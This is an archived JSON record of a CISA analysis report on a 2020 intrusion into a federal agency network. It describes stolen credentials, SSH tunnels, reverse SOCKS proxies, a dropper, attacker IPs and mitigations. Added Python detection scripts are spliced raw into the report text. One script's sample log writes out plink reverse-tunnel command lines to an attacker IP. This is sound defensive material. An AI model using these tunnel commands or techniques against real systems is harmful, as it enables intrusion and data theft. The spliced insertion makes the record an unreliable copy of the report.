{
	"id": "d9f8aba5-d19e-4453-a0a4-aba759f7d0d5",
	"created_at": "2026-04-06T00:14:50.0722Z",
	"updated_at": "2026-04-10T03:20:03.310272Z",
	"deleted_at": null,
	"sha1_hash": "eab346f2ae14b7bc367b22d2b6bdab6d50f4d925",
	"title": "Federal Agency Compromised by Malicious Cyber Actor | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126421,
	"plain_text": "Federal Agency Compromised by Malicious Cyber Actor | CISA\r\nPublished: 2020-10-24 · Archived: 2026-04-05 13:37:30 UTC\r\nCISA became aware—via EINSTEIN, CISA’s intrusion detection system that monitors federal civilian networks\r\n—of a potential compromise of a federal agency’s network. In coordination with the affected agency, CISA\r\nconducted an incident response engagement, confirming malicious activity. The following information is derived\r\nexclusively from the incident response engagement and provides the threat actor’s tactics, techniques, and\r\nprocedures as well as indicators of compromise that CISA observed as part of the engagement.\r\nThreat Actor Activity\r\nThe cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and\r\ndomain administrator accounts, which they leveraged for Initial Access [TA0001] to the agency's network\r\n(Valid Accounts [T1078]). First, the threat actor logged into a user’s O365 account from Internet Protocol (IP)\r\naddress 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from\r\nInformation Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by\r\nTransmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual\r\nprivate network (VPN) server (Exploit Public-Facing Application [T1190]).\r\nCISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is\r\npossible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known\r\nvulnerability—CVE-2019-11510—in Pulse Secure (Exploitation for Credential Access [T1212]). 
In April 2019,\r\nPulse Secure released patches for several critical vulnerabilities—including CVE-2019-11510, which allows the\r\nremote, unauthenticated retrieval of files, including passwords.[1] CISA has observed wide exploitation of\r\nCVE-2019-11510 across the federal government.[2]\r\nAfter initial access, the threat actor performed Discovery [TA0007] by logging into an agency O365 email\r\naccount from 91.219.236[.]166 and viewing and downloading help desk email attachments with “Intranet\r\naccess” and “VPN passwords” in the subject line, despite already having privileged access (Email Collection\r\n[T1114], Unsecured Credentials: Credentials In Files [T1552.001]). (Note: these emails did not contain any\r\npasswords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address\r\n207.220.1[.]3 (External Remote Services [T1133]). The actor enumerated the Active Directory and Group\r\nPolicy key and changed a registry key for the Group Policy (Account Manipulation [T1098]). Immediately\r\nafterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig,\r\nnet, query, netstat, ping, whoami, and plink.exe—to enumerate the compromised system and\r\nnetwork (Command and Scripting Interpreter [T1059], System Network Configuration Discovery [T1016]).\r\nThe cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP\r\n185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and\r\ndisconnected multiple times, the connections were ultimately successful. During the same period, the actor used\r\nan alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB\r\nshare.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 1 of 6\r\nThe attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059]). 
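The enumeration burst and the plink.exe execution described above, as an added detection example in Python (not code from the CISA report or from the actor's tooling). It hunts over a constructed process-creation log; the log format, host names, user names, file paths and the plink command lines are assumptions, and the remote-port-39999-to-local-8100 forward on those command lines is an assumed reconstruction of the forwarding Table 1 describes, not captured telemetry:

```python
# Added example, not from the CISA report: hunt a constructed process-creation
# log for the enumeration burst and the plink.exe execution described above.
# Log format, host names, paths and command lines are assumptions for illustration.
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery utilities named in the report; conhost.exe accompanies every console
# process and is left out so it cannot satisfy the burst rule on its own.
DISCOVERY_TOOLS = {'ipconfig.exe', 'net.exe', 'query.exe', 'netstat.exe', 'ping.exe', 'whoami.exe'}
# plink switches that build tunnels: -R remote forward, -L local forward,
# -N no remote shell, -pw password on the command line.
TUNNEL_SWITCHES = {'-R', '-L', '-N', '-pw'}
# Windows binary name the report saw reused for plink; legitimate copies live under the OS directory.
MASQUERADE_NAMES = {'shellexperiencehost.exe'}
WINDOW = timedelta(minutes=10)
MIN_DISTINCT_TOOLS = 4

def parse_events(lines):
    # Constructed format: ISO time | host | user | image path | command line
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        ts, host, user, image, cmdline = [f.strip() for f in line.split('|', 4)]
        events.append({'ts': datetime.fromisoformat(ts), 'host': host, 'user': user,
                       'image': image.lower(), 'cmdline': cmdline})
    return events

def image_name(path):
    return path.rsplit('\\', 1)[-1]

def find_discovery_bursts(events):
    # At least MIN_DISTINCT_TOOLS different enumeration tools from one host/user inside WINDOW.
    by_actor = defaultdict(list)
    for e in events:
        if image_name(e['image']) in DISCOVERY_TOOLS:
            by_actor[(e['host'], e['user'])].append(e)
    alerts = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: e['ts'])
        for i, start in enumerate(evs):
            window = [e for e in evs[i:] if e['ts'] - start['ts'] <= WINDOW]
            tools = {image_name(e['image']) for e in window}
            if len(tools) >= MIN_DISTINCT_TOOLS:
                alerts.append({'type': 'discovery_burst', 'host': host, 'user': user,
                               'start': start['ts'].isoformat(), 'tools': sorted(tools)})
                break
    return alerts

def find_plink_tunnels(events):
    # plink.exe under its own name, any process started with SSH tunnel switches,
    # or a masqueraded system binary name running from outside the Windows directory.
    alerts = []
    for e in events:
        name = image_name(e['image'])
        switches = set(e['cmdline'].split()[1:]) & TUNNEL_SWITCHES
        reasons = []
        if name == 'plink.exe':
            reasons.append('plink_name')
        if switches:
            reasons.append('tunnel_switches')
        if name in MASQUERADE_NAMES and not e['image'].startswith('c:\\windows\\'):
            reasons.append('masquerade_path')
        if reasons:
            alerts.append({'type': 'ssh_tunnel_binary', 'host': e['host'], 'user': e['user'],
                           'image': e['image'], 'switches': sorted(switches),
                           'reasons': reasons, 'ts': e['ts'].isoformat()})
    return alerts

def hunt(lines):
    events = parse_events(lines)
    return find_discovery_bursts(events) + find_plink_tunnels(events)

# Constructed sample; the plink command lines are an assumed reconstruction of the
# report's remote-port-39999-to-local-8100 forward, not captured telemetry.
SAMPLE_LOG = '''
# time | host | user | image | command line
2020-08-13T09:00:00 | WS22 | AGENCY\\jdoe | C:\\Windows\\System32\\ping.exe | ping intranet
2020-08-13T14:02:11 | FS01 | AGENCY\\svc_tmp | C:\\Windows\\System32\\ipconfig.exe | ipconfig /all
2020-08-13T14:02:15 | FS01 | AGENCY\\svc_tmp | C:\\Windows\\System32\\net.exe | net group /domain
2020-08-13T14:02:40 | FS01 | AGENCY\\svc_tmp | C:\\Windows\\System32\\query.exe | query user
2020-08-13T14:03:05 | FS01 | AGENCY\\svc_tmp | C:\\Windows\\System32\\netstat.exe | netstat -ano
2020-08-13T14:03:40 | FS01 | AGENCY\\svc_tmp | C:\\Windows\\System32\\whoami.exe | whoami /priv
2020-08-13T14:05:02 | FS01 | AGENCY\\svc_tmp | C:\\Users\\Public\\plink.exe | plink.exe -N -R 39999:127.0.0.1:8100 ops@206.189.18.189
2020-08-13T14:20:00 | FS01 | AGENCY\\Administrator | C:\\ProgramData\\ShellExperienceHost.exe | ShellExperienceHost.exe -N -R 39999:127.0.0.1:8100 ops@206.189.18.189
'''

if __name__ == '__main__':
    for alert in hunt(SAMPLE_LOG.splitlines()):
        print(alert)
```

The burst rule is deliberately loose (four distinct tools in ten minutes) because administrators run the same commands; the discriminator in this incident is the tunnel binary launched from a writable path minutes later, so the two alert types should be correlated per host rather than triaged separately.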
(plink.exe is a command-line version of PuTTY that is used for remote administration.)\r\nThe cyber threat actor established Persistence [TA0003] and Command and Control [TA0011] on the victim\r\nnetwork by (1) creating a persistent Secure Shell (SSH) tunnel/reverse SOCKS proxy, (2) running\r\ninetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote\r\nshare on IP address 78.27.70[.]237 (Proxy [T1090]). The mounted file share allowed the actor to move freely\r\nduring its operations while leaving fewer artifacts for forensic analysis. Refer to the Threat Actor Malware section for\r\nmore information about the SSH tunnel/reverse SOCKS proxy and inetinfo.exe.\r\nThe cyber threat actor created a local account, which they used for data Collection [TA0009], Exfiltration\r\n[TA0010], Persistence [TA0003], and Command and Control [TA0011] (Create Account [T1136]). The\r\ncyber threat actor used the local account to:\r\nBrowse directories on a victim file server (Data from Network Shared Drive [T1039]).\r\nCopy a file from a user’s home directory to their locally mounted remote share (Data Staged [T1074]).\r\nCISA analysts detected the cyber threat actor interacting with other files on users’ home directories\r\nbut could not confirm whether they were exfiltrated.\r\nCreate a reverse SMB SOCKS proxy that allowed connection between a cyber threat actor-controlled\r\nVPS and the victim organization’s file server (refer to the Threat Actor Malware section for more information)\r\n(Proxy [T1090]).\r\nInteract with PowerShell module Invoke-TmpDavFS.psm (refer to the Threat Actor Malware section for more\r\ninformation).\r\nExfiltrate data from an account directory and file server directory using tsclient (tsclient is a\r\nMicrosoft Windows Terminal Services client) (Data from Local System [T1005], Data from Network\r\nShared Drive [T1039]).\r\nCreate two compressed Zip files with several files and directories on 
them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because\r\nthe actor masked their activity.\r\nSee figure 1 for the sequence of the cyber threat actor’s tactics and techniques.\r\nFigure 1: Cyber threat actor tactics and techniques\r\nThreat Actor Malware\r\nPersistent SSH Tunnel/Reverse SOCKS Proxy\r\nWhile logged in as “Administrator,” the cyber threat actor created two Scheduled Tasks (see table 1) that worked\r\nin concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between\r\nan attacker-controlled remote server and one of the victim organization’s file servers (Scheduled Task/Job [T1053],\r\nProxy [T1090]). The reverse SOCKS proxy communicated through port 8100 (Non-Standard Port [T1571]).\r\nThis port is normally closed, but the attacker’s malware opened it.\r\nTable 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy\r\nScheduled Task: ShellExperienceHost.exe\r\nDescription: This task created a persistent SSH tunnel to attacker-controlled remote server 206.189.18[.]189 and\r\nemployed port forwarding to allow connections from the remote server port 39999 to the victim file server through\r\nport 8100. This task was run daily. ShellExperienceHost.exe is a version of plink.exe, a command-line version of\r\nPuTTY that is used for remote administration.\r\nScheduled Task: WinDiag.exe\r\nDescription: This task is a reverse SOCKS proxy that is preconfigured to bind to and listen on TCP port 8100.\r\nWinDiag.exe received responses through the SSH tunnel and forwarded the responses through port 8100 to the VPS\r\nIP address 185.193.127[.]17 over port 443. This task was run on boot. WinDiag.exe had compile information that\r\nmatched the VPS login name.\r\nDropper Malware: inetinfo.exe\r\nThe threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053]). inetinfo.exe is\r\na unique, multi-stage malware used to drop files (figure 2). It dropped the files system.dll and 363691858 and a\r\nsecond instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted\r\n363691858 as a binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected\r\ninto the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary\r\nthen executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download\r\nand execution of a payload.\r\nFigure 2: Dropper malware inetinfo.exe\r\nThe cyber threat actor was able to overcome the agency’s anti-malware protection, and inetinfo.exe escaped\r\nquarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product’s software\r\nlicense key and installation guide and then visited a directory used by the product for temporary file analysis.\r\nAfter accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or\r\nModify Tools [T1562.001]).\r\nReverse SMB SOCKS Proxy\r\nPowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection\r\nbetween attacker-controlled VPS IP 185.193.127[.]18 and the victim organization’s file server over port 443\r\n
PowerShell script\r\nHardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053 ]).\r\nHardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1 , a free tool created and distributed by a security\r\nresearcher on GitHub.[3 ] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker\r\ninfrastructure through SMB TCP port 445 (Non-Standard Port [T1571 ]). The script was likely altered with the\r\ncyber threat actor’s configuration needs.\r\nPowerShell Module: invoke-TmpDavFS.psm\r\ninvoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning\r\n(WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80.\r\ninvoke-TmpDavFS.psm is distributed on GitHub.[4 ]\r\nSummary\r\nThis Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT\u0026CK®)\r\nframework. See the ATT\u0026CK for Enterprise framework for all referenced threat actor tactics and techniques.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on\r\na federal agency’s enterprise network. 
By leveraging compromised credentials, the cyber threat actor implanted\r\nsophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection\r\n—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in\r\nthe agency’s firewall.\r\nFor a downloadable copy of IOCs, see: AA20-268A.stix.\r\nSolution\r\nIndicators of Compromise\r\nCISA analysts identified several IP addresses involved in the multiple stages of the outlined attack.\r\n185.86.151[.]223 – Command and Control (C2)\r\n91.219.236[.]166 – C2\r\n207.220.1[.]3 – C2\r\n78.27.70[.]237 – Data Exfiltration\r\n185.193.127[.]18 – Persistence\r\nMonitor Network Traffic for Unusual Activity\r\nCISA recommends organizations monitor network traffic for the following unusual activity.\r\nUnusual open ports (e.g., port 8100)\r\nLarge outbound files\r\nUnexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP)\r\nIf network defenders note any of the above activity, they should investigate.\r\nPrevention\r\nCISA recommends organizations implement the following recommendations to protect against activity identified\r\nin this report.\r\nDeploy an Enterprise Firewall\r\nOrganizations should deploy an enterprise firewall to control what is allowed in and out of their network.\r\nIf the organization chooses not to deploy an enterprise firewall, they should work with their internet service\r\nprovider to ensure the firewall is configured properly.\r\nBlock Unused Ports\r\nOrganizations should conduct a survey of the traffic in and out of their enterprise to determine the ports needed for\r\norganizational functions. They should then configure their firewall to block unnecessary ports. Organizations\r\nshould develop a change control process to make changes to those rules. 
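The network monitoring heuristics and the port survey recommended above, as an added example in Python (not code from the CISA report). It triages a constructed connection log and a constructed listening-port inventory; the log format, the RFC 1918 ranges taken as internal, host names, approved-port lists and the 500 MB threshold are assumptions:

```python
# Added example, not from the CISA report: apply the report's network heuristics
# (unexpected outbound SSH/SMB/RDP, large outbound transfers, unusual listening
# ports) and its port-survey step to a constructed connection log. Log format,
# address ranges, hosts and thresholds are assumptions for illustration.
import ipaddress
from collections import defaultdict

# Assumed enterprise address space; anything else counts as the internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]
# Protocols the report calls out as unexpected outbound, plus FTP from Block Unused Ports.
RISKY_EGRESS_PORTS = {22: 'SSH', 445: 'SMB', 3389: 'RDP', 21: 'FTP'}

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def parse_flows(lines):
    # Constructed format: ISO time | src ip | dst ip | dst port | bytes sent by src
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        ts, src, dst, port, nbytes = [f.strip() for f in line.split('|')]
        flows.append({'ts': ts, 'src': src, 'dst': dst, 'port': int(port), 'bytes': int(nbytes)})
    return flows

def unapproved_egress(flows, risky=RISKY_EGRESS_PORTS):
    # Internal source talking to a public address on SSH/SMB/RDP/FTP.
    return [{'type': 'risky_egress', 'proto': risky[f['port']], 'src': f['src'],
             'dst': f['dst'], 'port': f['port'], 'ts': f['ts']}
            for f in flows
            if f['port'] in risky and is_internal(f['src']) and not is_internal(f['dst'])]

def large_outbound(flows, threshold_bytes):
    # Total bytes per internal host / public host pair; catches staging to a remote
    # share even when it rides a permitted port such as 443.
    totals = defaultdict(int)
    for f in flows:
        if is_internal(f['src']) and not is_internal(f['dst']):
            totals[(f['src'], f['dst'])] += f['bytes']
    return [{'type': 'large_outbound', 'src': s, 'dst': d, 'bytes': b}
            for (s, d), b in sorted(totals.items()) if b > threshold_bytes]

def unusual_listeners(listening_by_host, baseline_ports):
    # Listening-socket inventory (e.g. from netstat on each server) against the
    # approved baseline; the report's reverse SOCKS proxy opened TCP 8100.
    return sorted((host, port) for host, ports in listening_by_host.items()
                  for port in ports if port not in baseline_ports)

def ports_to_block(flows, approved_ports):
    # Survey step from Block Unused Ports: destination ports actually leaving the
    # enterprise that are not on the approved list become firewall deny rules.
    seen = {f['port'] for f in flows if is_internal(f['src']) and not is_internal(f['dst'])}
    return sorted(seen - set(approved_ports))

BASELINE_LISTEN_PORTS = {135, 445, 3389}
APPROVED_EGRESS_PORTS = {80, 443}

def triage(flow_lines, listeners, large_threshold=500 * 1024 * 1024):
    flows = parse_flows(flow_lines)
    return {'risky_egress': unapproved_egress(flows),
            'large_outbound': large_outbound(flows, large_threshold),
            'unusual_listeners': unusual_listeners(listeners, BASELINE_LISTEN_PORTS),
            'ports_to_block': ports_to_block(flows, APPROVED_EGRESS_PORTS)}

# Constructed sample telemetry reusing the report's external addresses; 203.0.113.10
# stands in for ordinary web traffic.
SAMPLE_FLOWS = '''
# time | src | dst | dst port | bytes
2020-08-13T14:05:03 | 10.20.30.5 | 206.189.18.189 | 22 | 18200
2020-08-13T14:05:10 | 10.20.30.5 | 185.193.127.18 | 445 | 4100
2020-08-13T14:06:00 | 10.20.30.5 | 78.27.70.237 | 443 | 612000000
2020-08-13T14:07:00 | 10.20.30.5 | 78.27.70.237 | 443 | 540000000
2020-08-13T15:00:00 | 10.20.30.44 | 203.0.113.10 | 443 | 2300
2020-08-13T15:01:00 | 10.20.30.44 | 10.20.30.5 | 445 | 50000
'''
SAMPLE_LISTENERS = {'FS01': {135, 445, 3389, 8100}}

if __name__ == '__main__':
    for key, findings in triage(SAMPLE_FLOWS.splitlines(), SAMPLE_LISTENERS).items():
        print(key, findings)
```

Port-based checks alone miss the report's reverse SMB SOCKS proxy and WebDAV module, which ride TCP 443 and 80; the byte-volume check and the listener inventory are what surface them, and the ports_to_block output is the input to the change-controlled firewall rules the report asks for.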
Of special note, unused SMB,\r\nSSH, and FTP ports should be blocked.\r\nAdditional Recommendations\r\nCISA recommends organizations implement the following best practices.\r\nImplement multi-factor authentication, especially for privileged accounts.\r\nUse separate administrative accounts on separate administration workstations.\r\nImplement the principle of least privilege on data access.\r\nSecure RDP and other remote access solutions using multifactor authentication and “jump boxes” for\r\naccess.\r\nDeploy and maintain endpoint defense tools on all endpoints.\r\nKeep software up to date.\r\nReferences\r\n[1] Pulse Secure Security Advisory SA44101 Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse\r\nConnect Secure / Pulse Policy Secure 9.0RX\r\n[3] GitHub Repository for Invoke-SocksProxy\r\n[4] GitHub Repository for Invoke-TmpDavFS\r\nRevisions\r\nSeptember 24, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a"
	],
	"report_names": [
		"ar20-268a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434490,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.pdf",
		"text": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.txt",
		"img": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.jpg"
	}
}